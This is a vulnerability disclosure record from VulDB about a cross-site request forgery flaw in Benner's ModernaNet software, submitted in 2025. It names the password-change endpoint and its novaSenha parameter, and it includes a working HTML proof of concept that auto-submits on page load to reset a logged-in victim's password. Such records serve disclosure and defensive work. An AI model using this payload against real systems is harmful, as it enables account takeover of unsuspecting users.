| Title | benner modernanet < 1.1.1 Cross-Site Request Forgery leads to Account Take Over |
|---|
| Description | Cross-Site Request Forgery leads to Account Take Over on Modernanet (Benner)
Description: A Cross-Site Request Forgery (CSRF) vulnerability exists in the Modernanet system, developed by Benner. This vulnerability allows an attacker to change the password of any user currently logged into the system without their consent. The attacker can exploit this flaw by tricking a victim into visiting a maliciously crafted page, which automatically submits a form that alters the user's password.
Impact: An attacker can execute unauthorized actions on behalf of an authenticated user, leading to a potential account compromise. The attack does not require any user interaction other than visiting the malicious page, making it a serious security risk.
Vulnerable Endpoint: URL: https://*.modernanet.com.br/DadosPessoais/SG_AlterarSenha
Method: GET
Vulnerable Parameter: novaSenha (new password)
Proof of Concept (PoC): The following HTML demonstrates the CSRF attack:
<!DOCTYPE html>
<html>
<head>
<title>PoC CSRF</title>
</head>
<body onload="document.getElementById('csrfForm').submit()">
<form id="csrfForm" method="GET" action="https://*.modernanet.com.br/DadosPessoais/SG_AlterarSenha">
<input type="hidden" name="novaSenha" value="PASSWORD HERE">
</form>
</body>
</html>
When the victim visits the page containing this code, the password of the logged-in user will be changed to the value specified in the 'novaSenha' parameter, with this vulnerability the attacker could take the victim's account. |
|---|
| Source | ⚠️ https://github.com/yago3008/cves |
|---|
| User | y4g0 (UID 80480) |
|---|
| Submission | 02/13/2025 17:40 (1 Year ago) |
|---|
| Moderation | 02/24/2025 18:22 (11 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 296693 [Benner ModernaNet up to 1.1.0 SG_AlterarSenha cross-site request forgery] |
|---|
| Points | 20 |
|---|